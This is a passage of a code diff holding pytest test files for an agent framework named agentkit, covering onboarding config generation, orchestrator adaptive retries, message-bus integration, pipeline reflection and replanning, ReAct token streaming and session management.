monkeypatch.chdir(empty_dir)
assert needs_onboarding() is False
class TestProviderPresets:
def test_all_presets_have_required_fields(self):
"""Every provider preset must have name, env_key, base_url, models."""
for key, preset in PROVIDER_PRESETS.items():
assert "name" in preset, f"{key} missing name"
assert "env_key" in preset, f"{key} missing env_key"
assert "base_url" in preset, f"{key} missing base_url"
assert "models" in preset, f"{key} missing models"
assert preset["models"], f"{key} has empty models"
assert "default_model" in preset, f"{key} missing default_model"
def test_preset_keys_are_lowercase(self):
"""Provider keys should be lowercase."""
for key in PROVIDER_PRESETS:
assert key == key.lower(), f"Provider key '{key}' should be lowercase"
def test_deepseek_preset(self):
"""DeepSeek preset should have correct configuration."""
ds = PROVIDER_PRESETS["deepseek"]
assert ds["env_key"] == "DEEPSEEK_API_KEY"
assert "deepseek-chat" in ds["models"]
assert ds["type"] == "openai"
def test_qwen_preset(self):
"""Qwen preset should use DashScope endpoint."""
qwen = PROVIDER_PRESETS["qwen"]
assert "dashscope" in qwen["base_url"]
assert qwen["env_key"] == "DASHSCOPE_API_KEY"
class TestRunOnboarding:
def test_onboarding_generates_config_files(self, tmp_path, monkeypatch):
"""Onboarding should generate agentkit.yaml and .env."""
monkeypatch.chdir(tmp_path)
monkeypatch.setenv("HOME", str(tmp_path / "home"))
(tmp_path / "home").mkdir(exist_ok=True)
# Mock user input
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
# Step 1: Select DeepSeek (option 1)
# Step 2: API key
# Step 2b: Select model (1 = deepseek-chat, default)
# Step 5: Agent personality (name, personality, speaking_style)
mock_prompt.ask.side_effect = ["1", "sk-test-deepseek-key", "1", "小王", "友好耐心", "简洁专业"]
# Step 3: No second provider
mock_confirm.ask.return_value = False
config_path = run_onboarding(output_dir=str(tmp_path))
assert config_path is not None
assert Path(config_path).exists()
# Verify agentkit.yaml content
with open(config_path) as f:
config = yaml.safe_load(f)
assert "llm" in config
assert "deepseek" in config["llm"]["providers"]
assert config["llm"]["providers"]["deepseek"]["base_url"] == "https://api.deepseek.com/v1"
# Verify .env content
env_path = tmp_path / ".env"
assert env_path.exists()
env_content = env_path.read_text()
assert "DEEPSEEK_API_KEY=sk-test-deepseek-key" in env_content
def test_onboarding_with_two_providers(self, tmp_path, monkeypatch):
"""Onboarding should support adding a second provider."""
monkeypatch.chdir(tmp_path)
monkeypatch.setenv("HOME", str(tmp_path / "home"))
(tmp_path / "home").mkdir(exist_ok=True)
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
# Select DeepSeek (1), API key, model (1), then Qwen as second
# After removing deepseek, remaining = [openai, bailian-coding, qwen, doubao, gemini, anthropic]
# qwen is at index 2, so option 3
# Step 5: Agent personality defaults
mock_prompt.ask.side_effect = ["1", "sk-deepseek", "1", "3", "sk-dashscope", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
mock_confirm.ask.return_value = True
config_path = run_onboarding(output_dir=str(tmp_path))
with open(config_path) as f:
config = yaml.safe_load(f)
providers = config["llm"]["providers"]
assert "deepseek" in providers
assert "qwen" in providers
env_path = tmp_path / ".env"
env_content = env_path.read_text()
assert "DEEPSEEK_API_KEY=sk-deepseek" in env_content
assert "DASHSCOPE_API_KEY=sk-dashscope" in env_content
def test_onboarding_cancelled_on_empty_api_key(self, tmp_path, monkeypatch):
"""Onboarding should return None if API key is empty."""
monkeypatch.chdir(tmp_path)
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt:
mock_prompt.ask.side_effect = ["1", ""] # Empty API key
result = run_onboarding(output_dir=str(tmp_path))
assert result is None
def test_onboarding_config_has_memory_backend(self, tmp_path, monkeypatch):
"""Generated config should use memory backends by default."""
monkeypatch.chdir(tmp_path)
monkeypatch.setenv("HOME", str(tmp_path / "home"))
(tmp_path / "home").mkdir(exist_ok=True)
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
mock_confirm.ask.return_value = False
config_path = run_onboarding(output_dir=str(tmp_path))
with open(config_path) as f:
config = yaml.safe_load(f)
assert config["session"]["backend"] == "memory"
assert config["bus"]["backend"] == "memory"
assert config["task_store"]["backend"] == "memory"
class TestOnboardingSoulGeneration:
"""U5: Onboarding 生成 SOUL.md 测试."""
def test_onboarding_creates_soul_md(self, tmp_path, monkeypatch):
"""Onboarding should create SOUL.md with custom agent name."""
monkeypatch.chdir(tmp_path)
home_dir = tmp_path / "home"
home_dir.mkdir(exist_ok=True)
monkeypatch.setenv("HOME", str(home_dir))
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "小王", "友好耐心", "简洁专业"]
mock_confirm.ask.return_value = False
run_onboarding(output_dir=str(tmp_path))
# Verify SOUL.md was created
soul_path = home_dir / ".agentkit" / "SOUL.md"
assert soul_path.exists()
soul_content = soul_path.read_text(encoding="utf-8")
assert "小王" in soul_content
assert "友好耐心" in soul_content
assert "简洁专业" in soul_content
def test_onboarding_soul_with_defaults(self, tmp_path, monkeypatch):
"""Onboarding with default personality should create default SOUL.md."""
monkeypatch.chdir(tmp_path)
home_dir = tmp_path / "home"
home_dir.mkdir(exist_ok=True)
monkeypatch.setenv("HOME", str(home_dir))
with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \
patch("agentkit.cli.onboarding.Confirm") as mock_confirm:
# Prompt.ask returns the default value when user presses Enter
# Our mock needs to return the actual default values
mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"]
mock_confirm.ask.return_value = False
run_onboarding(output_dir=str(tmp_path))
soul_path = home_dir / ".agentkit" / "SOUL.md"
assert soul_path.exists()
soul_content = soul_path.read_text(encoding="utf-8")
assert "AgentKit" in soul_content

View File

@ -0,0 +1,236 @@
"""Tests for Orchestrator adaptive task decomposition (U5)."""
import pytest
from datetime import datetime, timezone
from unittest.mock import AsyncMock, MagicMock
from agentkit.core.orchestrator import (
Orchestrator,
OrchestratorConfig,
OrchestrationResult,
SubTaskStatus,
)
from agentkit.core.protocol import TaskMessage, TaskStatus
# ── Test Helpers ──────────────────────────────────────────
def _make_task(**overrides) -> TaskMessage:
defaults = {
"task_id": "task-001",
"agent_name": "test_agent",
"task_type": "analyze",
"priority": 0,
"input_data": {"query": "test"},
"callback_url": None,
"created_at": datetime.now(timezone.utc),
"timeout_seconds": 60,
}
defaults.update(overrides)
return TaskMessage(**defaults)
def _make_mock_pool(agents: dict[str, AsyncMock] | None = None):
"""Create a mock AgentPool."""
pool = MagicMock()
if agents:
pool.get_agent = lambda name: agents.get(name)
pool.list_agents = lambda: [
{"name": name, "agent_type": "worker", "description": f"Agent {name}"}
for name in agents
]
else:
# Default: single agent that succeeds
mock_agent = AsyncMock()
mock_result = MagicMock()
mock_result.output_data = {"result": "done"}
mock_agent.execute = AsyncMock(return_value=mock_result)
pool.get_agent = lambda name: mock_agent
pool.list_agents = lambda: [
{"name": "test_agent", "agent_type": "worker", "description": "Test agent"}
]
return pool
# ── OrchestratorConfig Tests ──────────────────────────────
class TestOrchestratorConfig:
def test_default_values(self):
config = OrchestratorConfig()
assert config.adaptive is False
assert config.max_iterations == 3
assert config.quality_threshold == 0.7
def test_custom_values(self):
config = OrchestratorConfig(
adaptive=True,
max_iterations=5,
quality_threshold=0.9,
)
assert config.adaptive is True
assert config.max_iterations == 5
assert config.quality_threshold == 0.9
# ── Adaptive Execution Tests ─────────────────────────────
class TestOrchestratorAdaptive:
@pytest.mark.asyncio
async def test_adaptive_false_behaves_like_execute(self):
"""When adaptive=False, execute_adaptive should behave like execute."""
pool = _make_mock_pool()
config = OrchestratorConfig(adaptive=False)
orch = Orchestrator(agent_pool=pool, config=config)
task = _make_task()
result = await orch.execute_adaptive(task)
assert result.status == TaskStatus.COMPLETED
@pytest.mark.asyncio
async def test_rule_based_evaluate_all_completed(self):
"""All completed subtasks should score 1.0."""
pool = _make_mock_pool()
config = OrchestratorConfig(adaptive=True)
orch = Orchestrator(agent_pool=pool, config=config)
result = OrchestrationResult(
plan_id="p1",
parent_task_id="t1",
subtask_results={
"st1": {"status": "completed", "output": "ok"},
"st2": {"status": "completed", "output": "ok"},
},
aggregated_result={},
status=TaskStatus.COMPLETED,
total_duration_ms=100,
)
quality = orch._rule_based_evaluate(result)
assert quality["score"] == 1.0
@pytest.mark.asyncio
async def test_rule_based_evaluate_partial(self):
"""Partial completion should score proportionally."""
pool = _make_mock_pool()
config = OrchestratorConfig(adaptive=True)
orch = Orchestrator(agent_pool=pool, config=config)
result = OrchestrationResult(
plan_id="p1",
parent_task_id="t1",
subtask_results={
"st1": {"status": "completed", "output": "ok"},
"st2": {"status": "failed", "error": "bad"},
},
aggregated_result={},
status=TaskStatus.COMPLETED,
total_duration_ms=100,
)
quality = orch._rule_based_evaluate(result)
assert quality["score"] == 0.5
assert "st2" in quality["feedback"]
@pytest.mark.asyncio
async def test_rule_based_evaluate_empty(self):
"""No subtasks should score 0.0."""
pool = _make_mock_pool()
config = OrchestratorConfig(adaptive=True)
orch = Orchestrator(agent_pool=pool, config=config)
result = OrchestrationResult(
plan_id="p1",
parent_task_id="t1",
subtask_results={},
aggregated_result={},
status=TaskStatus.FAILED,
total_duration_ms=100,
)
quality = orch._rule_based_evaluate(result)
assert quality["score"] == 0.0
@pytest.mark.asyncio
async def test_adaptive_first_round_pass(self):
"""If first round quality passes, return directly."""
pool = _make_mock_pool()
config = OrchestratorConfig(
adaptive=True,
quality_threshold=0.5,
)
orch = Orchestrator(agent_pool=pool, config=config)
task = _make_task()
result = await orch.execute_adaptive(task)
# All subtasks complete in mock, so quality = 1.0 >= 0.5
assert result.status == TaskStatus.COMPLETED
@pytest.mark.asyncio
async def test_orchestration_result_metadata(self):
"""OrchestrationResult should have metadata field."""
result = OrchestrationResult(
plan_id="p1",
parent_task_id="t1",
subtask_results={},
aggregated_result={},
status=TaskStatus.COMPLETED,
total_duration_ms=100,
)
assert result.metadata == {}
@pytest.mark.asyncio
async def test_reexecute_failed_preserves_completed(self):
"""_reexecute_failed should keep completed subtask results."""
pool = _make_mock_pool()
config = OrchestratorConfig(adaptive=True)
orch = Orchestrator(agent_pool=pool, config=config)
task = _make_task()
previous = OrchestrationResult(
plan_id="p1",
parent_task_id="task-001",
subtask_results={
"st1": {"status": "completed", "output": "ok"},
"st2": {"status": "failed", "error": "bad"},
},
aggregated_result={},
status=TaskStatus.COMPLETED,
total_duration_ms=100,
)
quality = {"score": 0.5, "feedback": "Fix st2"}
result = await orch._reexecute_failed(task, previous, quality)
# st1 should be preserved
assert "st1" in result.subtask_results
assert result.subtask_results["st1"]["status"] == "completed"
@pytest.mark.asyncio
async def test_max_iterations_respected(self):
"""Adaptive loop should not exceed max_iterations."""
# Create a pool where agent always fails
mock_agent = AsyncMock()
mock_agent.execute = AsyncMock(side_effect=RuntimeError("always fails"))
pool = MagicMock()
pool.get_agent = lambda name: mock_agent
pool.list_agents = lambda: [
{"name": "test_agent", "agent_type": "worker", "description": "Test"}
]
config = OrchestratorConfig(
adaptive=True,
max_iterations=2,
quality_threshold=0.9,
)
orch = Orchestrator(agent_pool=pool, config=config)
task = _make_task()
result = await orch.execute_adaptive(task)
# Should have attempted iterations
assert result.status in (TaskStatus.FAILED, TaskStatus.COMPLETED)

View File

@ -0,0 +1,118 @@
"""Tests for Orchestrator + MessageBus integration (U7)."""
import asyncio
import pytest
from datetime import datetime, timezone
from unittest.mock import AsyncMock, MagicMock
from agentkit.bus.message import AgentMessage
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.core.orchestrator import Orchestrator, OrchestratorConfig
from agentkit.core.protocol import TaskMessage, TaskStatus
def _make_task(**overrides) -> TaskMessage:
defaults = {
"task_id": "task-001",
"agent_name": "test_agent",
"task_type": "analyze",
"priority": 0,
"input_data": {"query": "test"},
"callback_url": None,
"created_at": datetime.now(timezone.utc),
"timeout_seconds": 60,
}
defaults.update(overrides)
return TaskMessage(**defaults)
def _make_mock_pool():
"""Create a mock AgentPool with a working agent."""
mock_agent = AsyncMock()
mock_result = MagicMock()
mock_result.output_data = {"result": "done"}
mock_agent.execute = AsyncMock(return_value=mock_result)
pool = MagicMock()
pool.get_agent = lambda name: mock_agent
pool.list_agents = lambda: [
{"name": "test_agent", "agent_type": "worker", "description": "Test agent"}
]
return pool
class TestOrchestratorWithMessageBus:
@pytest.mark.asyncio
async def test_worker_publishes_progress(self):
"""Worker should publish progress via MessageBus after execution."""
bus = InMemoryMessageBus()
pool = _make_mock_pool()
orch = Orchestrator(agent_pool=pool, message_bus=bus)
# Subscribe orchestrator to receive progress
progress_messages: list[AgentMessage] = []
await bus.subscribe("orchestrator", lambda msg: progress_messages.append(msg))
task = _make_task()
result = await orch.execute(task)
assert result.status == TaskStatus.COMPLETED
# Give consumer task time to process
await asyncio.sleep(0.2)
assert len(progress_messages) >= 1
assert progress_messages[0].topic == "task.progress"
@pytest.mark.asyncio
async def test_no_message_bus_works_normally(self):
"""Without MessageBus, Orchestrator should work normally."""
pool = _make_mock_pool()
orch = Orchestrator(agent_pool=pool)
task = _make_task()
result = await orch.execute(task)
assert result.status == TaskStatus.COMPLETED
@pytest.mark.asyncio
async def test_message_bus_injected_via_config(self):
"""MessageBus should be injectable via constructor."""
bus = InMemoryMessageBus()
pool = _make_mock_pool()
config = OrchestratorConfig(adaptive=True)
orch = Orchestrator(
agent_pool=pool,
message_bus=bus,
config=config,
)
assert orch._message_bus is bus
class TestAgentPoolWithMessageBus:
@pytest.mark.asyncio
async def test_agent_registered_to_bus_on_create(self):
"""Agent should be registered to MessageBus when created."""
from agentkit.core.agent_pool import AgentPool
from agentkit.llm.gateway import LLMGateway
from agentkit.skills.registry import SkillRegistry
bus = InMemoryMessageBus()
pool = AgentPool(
llm_gateway=MagicMock(spec=LLMGateway),
skill_registry=SkillRegistry(),
message_bus=bus,
)
# Verify bus has the message_bus reference
assert pool._message_bus is bus
@pytest.mark.asyncio
async def test_pool_without_bus_works(self):
"""AgentPool without MessageBus should work normally."""
from agentkit.core.agent_pool import AgentPool
from agentkit.llm.gateway import LLMGateway
from agentkit.skills.registry import SkillRegistry
pool = AgentPool(
llm_gateway=MagicMock(spec=LLMGateway),
skill_registry=SkillRegistry(),
)
assert pool._message_bus is None

View File

@ -0,0 +1,285 @@
"""Tests for Pipeline reflection-replanning (U4)."""
import pytest
from agentkit.orchestrator.pipeline_engine import PipelineEngine
from agentkit.orchestrator.pipeline_schema import (
AdaptiveConfig,
Pipeline,
PipelineResult,
PipelineStage,
ReflectionReport,
StageResult,
StageStatus,
)
from agentkit.orchestrator.reflection import PipelineReflector, PipelineReplanner
# ── Test Helpers ──────────────────────────────────────────
def _make_pipeline(
stages: list[dict] | None = None,
name: str = "test_pipeline",
) -> Pipeline:
"""Build a Pipeline from simple stage dicts."""
if stages is None:
stages = [
{"name": "step1", "agent": "agent_a", "action": "do_thing"},
{"name": "step2", "agent": "agent_b", "action": "do_other"},
]
pipeline_stages = [PipelineStage(**s) for s in stages]
return Pipeline(
name=name,
version="1.0",
description="Test pipeline",
stages=pipeline_stages,
)
def _make_failed_result(
pipeline_name: str = "test_pipeline",
failed_stage: str = "step2",
error_message: str = "Connection timeout after 300s",
completed_stages: dict[str, dict] | None = None,
) -> PipelineResult:
"""Build a failed PipelineResult."""
stage_results = {}
if completed_stages:
for name, output in completed_stages.items():
stage_results[name] = StageResult(
stage_name=name,
status=StageStatus.COMPLETED,
output_data=output,
)
stage_results[failed_stage] = StageResult(
stage_name=failed_stage,
status=StageStatus.FAILED,
error_message=error_message,
)
return PipelineResult(
pipeline_name=pipeline_name,
status=StageStatus.FAILED,
stage_results=stage_results,
error_message=f"Stage '{failed_stage}' failed",
)
# ── PipelineReflector Tests ──────────────────────────────
class TestPipelineReflector:
@pytest.mark.asyncio
async def test_rule_based_timeout_reflection(self):
"""Timeout errors should be classified as 'timeout'."""
reflector = PipelineReflector()
pipeline = _make_pipeline()
result = _make_failed_result(error_message="Timeout after 300s")
report = await reflector.reflect(pipeline, result)
assert report.failure_type == "timeout"
assert "step2" in report.root_cause
assert "timeout" in report.suggested_fix.lower()
@pytest.mark.asyncio
async def test_rule_based_resource_error_reflection(self):
"""Not-found errors should be classified as 'resource_error'."""
reflector = PipelineReflector()
pipeline = _make_pipeline()
result = _make_failed_result(error_message="Resource not found: database")
report = await reflector.reflect(pipeline, result)
assert report.failure_type == "resource_error"
@pytest.mark.asyncio
async def test_rule_based_input_error_reflection(self):
"""Validation errors should be classified as 'input_error'."""
reflector = PipelineReflector()
pipeline = _make_pipeline()
result = _make_failed_result(error_message="Invalid input: missing field 'name'")
report = await reflector.reflect(pipeline, result)
assert report.failure_type == "input_error"
@pytest.mark.asyncio
async def test_rule_based_logic_error_reflection(self):
"""Generic errors should be classified as 'logic_error'."""
reflector = PipelineReflector()
pipeline = _make_pipeline()
result = _make_failed_result(error_message="Unexpected state transition")
report = await reflector.reflect(pipeline, result)
assert report.failure_type == "logic_error"
@pytest.mark.asyncio
async def test_reflection_report_fields(self):
"""ReflectionReport should contain all required fields."""
reflector = PipelineReflector()
pipeline = _make_pipeline()
result = _make_failed_result(error_message="Timeout")
report = await reflector.reflect(pipeline, result, reflection_number=2)
assert report.failed_stage == "step2"
assert report.reflection_number == 2
assert report.root_cause
assert report.suggested_fix
@pytest.mark.asyncio
async def test_reflection_with_completed_outputs(self):
"""Reflector should handle completed stage outputs correctly."""
reflector = PipelineReflector()
pipeline = _make_pipeline()
result = _make_failed_result(
error_message="Error",
completed_stages={"step1": {"data": "value"}},
)
report = await reflector.reflect(pipeline, result)
assert report.failed_stage == "step2"
# ── PipelineReplanner Tests ──────────────────────────────
class TestPipelineReplanner:
@pytest.mark.asyncio
async def test_replan_preserves_completed_stages(self):
"""Replanned pipeline should keep completed stages unchanged."""
replanner = PipelineReplanner()
pipeline = _make_pipeline()
result = _make_failed_result(
completed_stages={"step1": {"data": "ok"}},
)
report = ReflectionReport(
failure_type="timeout",
root_cause="Step timed out",
suggested_fix="Increase timeout",
failed_stage="step2",
)
new_pipeline = await replanner.replan(pipeline, result, report)
assert len(new_pipeline.stages) == 2
assert new_pipeline.stages[0].name == "step1"
@pytest.mark.asyncio
async def test_replan_adjusts_timeout_stage(self):
"""Timeout failure should increase timeout_seconds on the failed stage."""
replanner = PipelineReplanner()
pipeline = _make_pipeline([
{"name": "step1", "agent": "a", "action": "do"},
{"name": "step2", "agent": "b", "action": "do", "timeout_seconds": 300},
])
result = _make_failed_result(error_message="Timeout after 300s")
report = ReflectionReport(
failure_type="timeout",
root_cause="Timeout",
suggested_fix="Increase timeout",
failed_stage="step2",
)
new_pipeline = await replanner.replan(pipeline, result, report)
failed_stage = next(s for s in new_pipeline.stages if s.name == "step2")
assert failed_stage.timeout_seconds == 600 # doubled
assert failed_stage.retry_policy is not None
@pytest.mark.asyncio
async def test_replan_resource_error_sets_continue_on_failure(self):
"""Resource error should set continue_on_failure on the failed stage."""
replanner = PipelineReplanner()
pipeline = _make_pipeline()
result = _make_failed_result(error_message="Not found")
report = ReflectionReport(
failure_type="resource_error",
root_cause="Resource missing",
suggested_fix="Skip and continue",
failed_stage="step2",
)
new_pipeline = await replanner.replan(pipeline, result, report)
failed_stage = next(s for s in new_pipeline.stages if s.name == "step2")
assert failed_stage.continue_on_failure is True
@pytest.mark.asyncio
async def test_replan_name_includes_replanned(self):
"""Replanned pipeline name should indicate it was replanned."""
replanner = PipelineReplanner()
pipeline = _make_pipeline()
result = _make_failed_result()
report = ReflectionReport(
failure_type="logic_error",
root_cause="Bad logic",
suggested_fix="Fix logic",
failed_stage="step2",
)
new_pipeline = await replanner.replan(pipeline, result, report)
assert "replanned" in new_pipeline.name
# ── PipelineEngine Adaptive Integration Tests ────────────
class TestPipelineEngineAdaptive:
@pytest.mark.asyncio
async def test_adaptive_disabled_no_reflection(self):
"""When adaptive is disabled, failed pipeline returns as-is."""
engine = PipelineEngine() # dry-run mode
pipeline = _make_pipeline([
{"name": "fail_step", "agent": "a", "action": "fail",
"continue_on_failure": False},
])
# In dry-run mode, stages succeed. We need to simulate failure.
# Use a pipeline that will fail due to circular dependency.
# Actually, let's test with a simpler approach: verify that
# without adaptive_config, the result is returned directly.
result = await engine.execute(pipeline)
# Dry-run succeeds, so no reflection needed
assert result.status == StageStatus.COMPLETED
@pytest.mark.asyncio
async def test_adaptive_enabled_triggers_reflection_on_failure(self):
"""When adaptive is enabled and pipeline fails, reflection should trigger."""
engine = PipelineEngine() # dry-run mode
# Create a pipeline that will fail due to circular dependency
pipeline = _make_pipeline([
{"name": "step1", "agent": "a", "action": "do",
"depends_on": ["step2"]},
{"name": "step2", "agent": "b", "action": "do",
"depends_on": ["step1"]},
])
config = AdaptiveConfig(enabled=True, max_reflections=2)
result = await engine.execute(pipeline, adaptive_config=config)
# Circular dependency causes immediate failure
assert result.status == StageStatus.FAILED
# No reflections because the pipeline fails before any stage runs
# (topological sort fails)
@pytest.mark.asyncio
async def test_adaptive_config_default_disabled(self):
"""AdaptiveConfig default should have enabled=False."""
config = AdaptiveConfig()
assert config.enabled is False
assert config.max_reflections == 3
@pytest.mark.asyncio
async def test_pipeline_result_metadata_field(self):
"""PipelineResult should have metadata field for reflection tracking."""
result = PipelineResult(pipeline_name="test")
assert result.metadata == {}
@pytest.mark.asyncio
async def test_reflection_report_model_dump(self):
"""ReflectionReport should be serializable via model_dump."""
report = ReflectionReport(
failure_type="timeout",
root_cause="Timed out",
suggested_fix="Increase timeout",
failed_stage="step1",
reflection_number=1,
)
data = report.model_dump()
assert data["failure_type"] == "timeout"
assert data["reflection_number"] == 1

View File

@ -0,0 +1,127 @@
"""Tests for ReAct engine token streaming via execute_stream()."""
import pytest
from unittest.mock import AsyncMock, MagicMock
from agentkit.core.react import ReActEngine, ReActEvent
from agentkit.llm.gateway import LLMGateway
from agentkit.llm.protocol import LLMResponse, StreamChunk, TokenUsage
def _make_stream_chunks(
content_parts: list[str],
model: str = "test-model",
usage: TokenUsage | None = None,
) -> list[StreamChunk]:
"""Build a list of StreamChunk objects simulating a streaming response."""
chunks = []
for part in content_parts:
chunks.append(StreamChunk(content=part, model=model))
# Final chunk with usage
chunks.append(StreamChunk(
content="",
model=model,
usage=usage or TokenUsage(prompt_tokens=10, completion_tokens=20),
is_final=True,
))
return chunks
def _make_stream_gateway(chunks_list: list[list[StreamChunk]]) -> MagicMock:
"""Create a mock LLMGateway whose chat_stream yields the given chunks."""
gateway = MagicMock(spec=LLMGateway)
async def _stream(**kwargs):
for chunks in chunks_list:
for chunk in chunks:
yield chunk
# Remove after use
chunks_list.pop(0)
gateway.chat_stream = _stream
return gateway
class TestReActTokenStreaming:
"""Test that execute_stream() yields token events from chat_stream()."""
@pytest.mark.asyncio
async def test_yields_token_events(self):
"""execute_stream should yield token events for each stream chunk."""
chunks = _make_stream_chunks(["Hello", " world", "!"])
gateway = _make_stream_gateway([chunks])
engine = ReActEngine(llm_gateway=gateway)
events = []
async for event in engine.execute_stream(
messages=[{"role": "user", "content": "Hi"}],
):
events.append(event)
token_events = [e for e in events if e.event_type == "token"]
assert len(token_events) == 3
assert token_events[0].data["content"] == "Hello"
assert token_events[1].data["content"] == " world"
assert token_events[2].data["content"] == "!"
@pytest.mark.asyncio
async def test_final_answer_after_streaming(self):
"""After streaming tokens, a final_answer event should be yielded."""
chunks = _make_stream_chunks(["The answer is 42"])
gateway = _make_stream_gateway([chunks])
engine = ReActEngine(llm_gateway=gateway)
events = []
async for event in engine.execute_stream(
messages=[{"role": "user", "content": "What?"}],
):
events.append(event)
final_events = [e for e in events if e.event_type == "final_answer"]
assert len(final_events) == 1
assert "42" in final_events[0].data.get("output", "")
@pytest.mark.asyncio
async def test_token_events_have_correct_step(self):
"""Token events should carry the current step number."""
chunks = _make_stream_chunks(["Hi"])
gateway = _make_stream_gateway([chunks])
engine = ReActEngine(llm_gateway=gateway)
events = []
async for event in engine.execute_stream(
messages=[{"role": "user", "content": "Hi"}],
):
events.append(event)
token_events = [e for e in events if e.event_type == "token"]
for te in token_events:
assert te.step >= 1
@pytest.mark.asyncio
async def test_build_response_from_stream(self):
"""_build_response_from_stream should construct a valid LLMResponse."""
usage = TokenUsage(prompt_tokens=5, completion_tokens=10)
response = ReActEngine._build_response_from_stream(
content="Hello world",
tool_calls=[],
usage=usage,
model="test-model",
)
assert response.content == "Hello world"
assert response.model == "test-model"
assert response.usage.prompt_tokens == 5
assert response.usage.completion_tokens == 10
assert not response.has_tool_calls
@pytest.mark.asyncio
async def test_build_response_from_stream_no_usage(self):
"""_build_response_from_stream should handle None usage gracefully."""
response = ReActEngine._build_response_from_stream(
content="test",
tool_calls=[],
usage=None,
model="test-model",
)
assert response.content == "test"
assert response.usage.prompt_tokens == 0

View File

@ -0,0 +1,199 @@
"""Tests for SessionManager."""
import pytest
from agentkit.session.manager import SessionManager
from agentkit.session.models import MessageRole, SessionStatus
from agentkit.session.store import InMemorySessionStore
@pytest.fixture
def manager():
return SessionManager(store=InMemorySessionStore())
class TestSessionManagerCreate:
@pytest.mark.asyncio
async def test_create_session(self, manager):
session = await manager.create_session(agent_name="test-agent")
assert session.session_id is not None
assert session.agent_name == "test-agent"
assert session.status == SessionStatus.ACTIVE
@pytest.mark.asyncio
async def test_create_session_with_metadata(self, manager):
session = await manager.create_session(
agent_name="agent1",
metadata={"user_id": "u1"},
)
assert session.metadata == {"user_id": "u1"}
class TestSessionManagerGet:
@pytest.mark.asyncio
async def test_get_existing_session(self, manager):
created = await manager.create_session(agent_name="agent1")
fetched = await manager.get_session(created.session_id)
assert fetched is not None
assert fetched.session_id == created.session_id
@pytest.mark.asyncio
async def test_get_nonexistent_session(self, manager):
result = await manager.get_session("nonexistent")
assert result is None
class TestSessionManagerLifecycle:
@pytest.mark.asyncio
async def test_pause_and_resume(self, manager):
session = await manager.create_session(agent_name="agent1")
paused = await manager.pause_session(session.session_id)
assert paused.status == SessionStatus.PAUSED
resumed = await manager.resume_session(session.session_id)
assert resumed.status == SessionStatus.ACTIVE
@pytest.mark.asyncio
async def test_close_session(self, manager):
session = await manager.create_session(agent_name="agent1")
closed = await manager.close_session(session.session_id)
assert closed.status == SessionStatus.CLOSED
@pytest.mark.asyncio
async def test_close_nonexistent_returns_none(self, manager):
result = await manager.close_session("nonexistent")
assert result is None
@pytest.mark.asyncio
async def test_delete_session(self, manager):
session = await manager.create_session(agent_name="agent1")
deleted = await manager.delete_session(session.session_id)
assert deleted is True
assert await manager.get_session(session.session_id) is None
@pytest.mark.asyncio
async def test_delete_nonexistent_returns_false(self, manager):
deleted = await manager.delete_session("nonexistent")
assert deleted is False
class TestSessionManagerMessages:
@pytest.mark.asyncio
async def test_append_user_message(self, manager):
session = await manager.create_session(agent_name="agent1")
msg = await manager.append_message(
session_id=session.session_id,
role=MessageRole.USER,
content="Hello",
)
assert msg.role == MessageRole.USER
assert msg.content == "Hello"
assert msg.session_id == session.session_id
@pytest.mark.asyncio
async def test_append_assistant_message(self, manager):
session = await manager.create_session(agent_name="agent1")
msg = await manager.append_message(
session_id=session.session_id,
role=MessageRole.ASSISTANT,
content="Hi there!",
)
assert msg.role == MessageRole.ASSISTANT
@pytest.mark.asyncio
async def test_get_messages(self, manager):
session = await manager.create_session(agent_name="agent1")
await manager.append_message(session_id=session.session_id, role=MessageRole.USER, content="Hello")
await manager.append_message(session_id=session.session_id, role=MessageRole.ASSISTANT, content="Hi!")
messages = await manager.get_messages(session.session_id)
assert len(messages) == 2
assert messages[0].content == "Hello"
assert messages[1].content == "Hi!"
@pytest.mark.asyncio
async def test_get_messages_pagination(self, manager):
session = await manager.create_session(agent_name="agent1")
for i in range(10):
await manager.append_message(
session_id=session.session_id,
role=MessageRole.USER,
content=f"Message {i}",
)
# Get first 3 messages
page1 = await manager.get_messages(session.session_id, limit=3, offset=0)
assert len(page1) == 3
assert page1[0].content == "Message 0"
# Get next 3 messages
page2 = await manager.get_messages(session.session_id, limit=3, offset=3)
assert len(page2) == 3
assert page2[0].content == "Message 3"
@pytest.mark.asyncio
async def test_count_messages(self, manager):
session = await manager.create_session(agent_name="agent1")
await manager.append_message(session_id=session.session_id, role=MessageRole.USER, content="Hello")
await manager.append_message(session_id=session.session_id, role=MessageRole.ASSISTANT, content="Hi!")
count = await manager.count_messages(session.session_id)
assert count == 2
@pytest.mark.asyncio
async def test_closed_session_rejects_messages(self, manager):
session = await manager.create_session(agent_name="agent1")
await manager.close_session(session.session_id)
with pytest.raises(ValueError, match="closed"):
await manager.append_message(
session_id=session.session_id,
role=MessageRole.USER,
content="Should fail",
)
@pytest.mark.asyncio
async def test_nonexistent_session_rejects_messages(self, manager):
with pytest.raises(ValueError, match="not found"):
await manager.append_message(
session_id="nonexistent",
role=MessageRole.USER,
content="Should fail",
)
@pytest.mark.asyncio
async def test_get_chat_messages(self, manager):
session = await manager.create_session(agent_name="agent1")
await manager.append_message(session_id=session.session_id, role=MessageRole.USER, content="Hello")
await manager.append_message(session_id=session.session_id, role=MessageRole.ASSISTANT, content="Hi!")
chat_msgs = await manager.get_chat_messages(session.session_id)
assert len(chat_msgs) == 2
assert chat_msgs[0] == {"role": "user", "content": "Hello"}
assert chat_msgs[1] == {"role": "assistant", "content": "Hi!"}
class TestSessionManagerList:
@pytest.mark.asyncio
async def test_list_sessions(self, manager):
await manager.create_session(agent_name="agent1")
await manager.create_session(agent_name="agent2")
